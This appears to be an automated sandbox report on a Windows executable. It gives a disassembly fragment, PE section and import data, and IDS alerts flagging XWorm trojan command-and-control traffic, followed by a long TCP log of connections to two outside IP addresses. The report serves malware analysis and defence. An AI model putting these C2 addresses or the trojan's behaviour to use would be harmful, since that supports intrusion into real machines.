                  mov ecx, dword ptr [eax+68h]
                  mov dword ptr [esi+04h], ecx
                  mov ecx, dword ptr [esi]
                  cmp ecx, dword ptr [004201F8h]
                  je 00007F62F0CEF5D4h
                  mov ecx, dword ptr [0041FFB0h]
                  test dword ptr [eax+70h], ecx
                  jne 00007F62F0CEF5C9h
                  call 00007F62F0CF734Fh
                  mov dword ptr [esi], eax
                  mov eax, dword ptr [esi+04h]
                  cmp eax, dword ptr [0041FEB8h]
                  je 00007F62F0CEF5D8h
                  mov eax, dword ptr [esi+08h]
                  mov ecx, dword ptr [0041FFB0h]
                  test dword ptr [eax+70h], ecx
                  jne 00007F62F0CEF5CAh
                  call 00007F62F0CF6BAEh
                  mov dword ptr [esi+04h], eax
                  mov eax, dword ptr [esi+08h]
                  test byte ptr [eax+70h], 00000002h
                  jne 00007F62F0CEF5D6h
                  or dword ptr [eax+70h], 02h
                  mov byte ptr [esi+0Ch], 00000001h
                  jmp 00007F62F0CEF5CCh
                  mov ecx, dword ptr [eax]
                  mov dword ptr [esi], ecx
                  mov eax, dword ptr [eax+04h]
                  mov dword ptr [esi+04h], eax
                  mov eax, esi
                  pop esi
                  pop ebp
                  retn 0004h
                  mov edi, edi
                  push ebp
                  mov ebp, esp
                  sub esp, 10h
                  mov eax, dword ptr [0041F920h]
                  xor eax, ebp
                  mov dword ptr [ebp-04h], eax
                  mov edx, dword ptr [ebp+18h]
                  push ebx
                  Programming Language:
                  • [ASM] VS2010 build 30319
                  • [ C ] VS2010 build 30319
                  • [IMP] VS2008 SP1 build 30729
                  • [C++] VS2010 build 30319
                  • [RES] VS2010 build 30319
                  • [LNK] VS2010 build 30319
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1d95c0x3c.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x230000x1c748.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x400000x138c.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1c3680x40.rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x190000x150.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x175480x176002832193bc838d3749cda385130dee996False0.5840261530748663data6.643994573279363IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x190000x50e00x5200f70895b146c7db1f8f77e00dd643556fFalse0.35980373475609756data4.92490653021865IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x1f0000x37c40x1a00268250434fbffdf0a4bf9cf4a64d29c5False0.3167067307692308data3.867957401461582IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x230000x1c7480x1c80013c7e8b4f8049f0b57e98c87b62e9647False0.2745768229166667data4.800930470827677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x400000x1e2c0x2000061df8fc06366d9ad70b17618c2ca63bFalse0.482666015625data4.816108713673021IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_ICON0x233a00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152ChineseChina0.2554878048780488
                  RT_ICON0x23a080x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512ChineseChina0.3602150537634409
                  RT_ICON0x23cf00x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288ChineseChina0.39344262295081966
                  RT_ICON0x23ed80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128ChineseChina0.4358108108108108
                  RT_ICON0x240000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsChineseChina0.4986673773987207
                  RT_ICON0x24ea80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsChineseChina0.5888989169675091
                  RT_ICON0x257500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsChineseChina0.548963133640553
                  RT_ICON0x25e180x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsChineseChina0.40534682080924855
                  RT_ICON0x263800x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584ChineseChina0.18236129184904767
                  RT_ICON0x36ba80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896ChineseChina0.3425838450637695
                  RT_ICON0x3add00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600ChineseChina0.3924273858921162
                  RT_ICON0x3d3780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224ChineseChina0.49953095684803
                  RT_ICON0x3e4200x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400ChineseChina0.580327868852459
                  RT_ICON0x3eda80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088ChineseChina0.6906028368794326
                  RT_GROUP_ICON0x3f2100xcadataChineseChina0.6089108910891089
                  RT_VERSION0x3f2dc0x304dataChineseChina0.43134715025906734
                  RT_MANIFEST0x3f5e00x165ASCII text, with CRLF line terminatorsEnglishUnited States0.5434173669467787
                  DLLImport
                  KERNEL32.dllCloseHandle, ReadFile, VirtualAlloc, GetFileSize, CreateFileA, Sleep, GetTickCount64, VirtualFree, SetEndOfFile, CreateFileW, SetStdHandle, WriteConsoleW, LoadLibraryW, IsValidLocale, InterlockedIncrement, InterlockedDecrement, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, GetSystemTimeAsFileTime, GetLastError, HeapFree, RaiseException, RtlUnwind, GetCommandLineA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, HeapAlloc, IsProcessorFeaturePresent, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, SetLastError, GetCurrentThreadId, GetProcAddress, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, ExitProcess, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, GetLocaleInfoW, HeapReAlloc, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, GetProcessHeap
                  WININET.dllInternetCloseHandle, InternetReadFile, InternetOpenUrlA, InternetOpenA
                  Language of compilation systemCountry where language is spokenMap
                  ChineseChina
                  EnglishUnited States
                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  07/02/24-19:26:55.721304TCP2852874ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2700049706156.238.235.31192.168.2.8
                  07/02/24-19:27:04.946686TCP2852870ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes700049706156.238.235.31192.168.2.8
                  07/02/24-19:23:17.813584TCP2855924ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497067000192.168.2.8156.238.235.31
                  07/02/24-19:27:04.947576TCP2852923ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)497067000192.168.2.8156.238.235.31
                  07/02/24-19:24:43.950928TCP2853193ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497067000192.168.2.8156.238.235.31
                  TimestampSource PortDest PortSource IPDest IP
                  Jul 2, 2024 19:22:59.991139889 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:22:59.995907068 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:22:59.996006966 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:22:59.996233940 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:00.001029015 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:00.946445942 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:00.946461916 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:00.946474075 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:00.946486950 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:00.946496010 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:00.946511030 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:00.946526051 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:00.946537971 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:00.946623087 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:00.946633101 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:00.946641922 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:00.946675062 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:00.946675062 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:00.946675062 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:00.946690083 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:00.951334953 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:00.951347113 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:00.951358080 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:00.951406002 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:00.951438904 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.302073956 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302087069 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302098989 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302146912 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.302165031 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.302506924 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302519083 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302530050 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302540064 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302551031 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302560091 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.302576065 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.302583933 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302603960 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.302612066 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302618980 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.302628994 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302639008 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302645922 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.302658081 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302664042 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.302675009 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.302684069 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302690983 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.302699089 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302710056 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302719116 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.302730083 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302740097 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.302747011 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.302755117 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302762985 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.302772045 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302784920 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302789927 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.302799940 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.302805901 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302815914 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.302836895 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.302856922 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302867889 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302881002 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.302889109 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.302906036 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.302922964 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.307363987 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.307429075 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.421938896 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.421956062 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.421972036 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.421982050 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.421993971 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.422005892 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.422018051 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.422070980 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.422331095 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.422377110 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.422416925 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.422460079 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.422491074 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.422502995 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.422513962 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.422532082 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.422549963 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.422600985 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.422611952 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.422641039 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.422657013 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.423424006 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.423476934 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.423486948 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.423494101 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.423511028 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.423537016 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.423566103 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.423576117 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.423588991 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.423614025 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.423630953 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.424340963 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.424387932 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.424401045 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.424407959 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.424422979 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.424436092 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.424448967 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.424465895 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:23:01.424504995 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:01.425235987 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:23:05.107872009 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:23:05.113145113 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:23:05.113220930 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:23:05.652075052 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:23:05.658193111 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:23:17.813584089 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:23:18.085616112 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:23:18.387418985 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:23:18.434319019 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:23:18.719752073 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:23:18.725368977 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:23:25.682087898 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:23:25.731236935 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:23:29.981570959 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:23:29.986515999 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:23:30.286210060 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:23:30.288188934 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:23:30.292913914 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:23:42.153372049 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:23:42.465631962 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:23:42.877859116 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:23:42.877876997 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:23:43.177283049 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:23:43.180020094 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:23:43.184878111 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:23:54.325288057 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:23:54.330372095 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:23:54.652184010 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:23:54.654565096 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:23:54.659383059 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:23:55.659696102 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:23:55.700001001 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:06.425262928 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:24:06.425389051 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:24:06.497422934 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:06.502285004 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:06.807269096 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:06.809983969 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:06.814826012 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:17.669141054 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:17.674427032 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:17.974517107 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:17.978669882 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:17.983838081 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:25.667812109 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:25.716942072 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:29.841072083 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:29.846110106 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:29.965981960 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:29.971129894 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:30.151529074 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:30.156148911 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:30.161011934 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:30.358733892 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:30.360450983 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:30.366384983 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:37.950642109 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:37.955559015 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:38.255681038 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:38.257930040 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:38.262753010 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:38.278716087 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:38.283634901 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:39.145371914 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:39.146814108 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:39.146862030 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:39.147449017 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:39.152283907 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:43.702933073 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:43.709467888 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:43.950927973 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:43.956299067 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:44.008140087 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:44.021699905 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:44.026808023 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:44.272063017 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:44.274032116 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:44.278929949 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:46.794173956 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:46.799113035 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:47.113542080 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:47.116076946 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:47.120932102 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:48.560273886 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:48.565360069 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:48.606879950 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:48.611761093 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:48.731966972 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:48.736819029 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:48.911901951 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:48.914133072 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:48.919294119 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:49.336723089 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:49.339853048 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:49.344671011 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:49.351239920 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:49.353641033 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:49.402008057 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:49.482139111 CEST49705881192.168.2.891.208.240.157
                  Jul 2, 2024 19:24:49.486979008 CEST8814970591.208.240.157192.168.2.8
                  Jul 2, 2024 19:24:55.686440945 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:55.732991934 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:55.934787989 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:56.247065067 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:56.262841940 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:56.265700102 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:56.575150967 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:56.577826977 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:56.585431099 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:57.059932947 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:57.065505028 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:57.368624926 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:57.378398895 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:57.386564970 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:59.231894970 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:59.237128973 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:59.545216084 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:24:59.548425913 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:24:59.553273916 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:06.671715975 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:06.676554918 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:06.976421118 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:06.984164000 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:06.989989042 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:15.794219017 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:15.799235106 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:16.101568937 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:16.104199886 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:16.109139919 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:25.219240904 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:25.224345922 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:25.544198990 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:25.548010111 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:25.552923918 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:25.806200981 CEST700049706156.238.235.31192.168.2.8
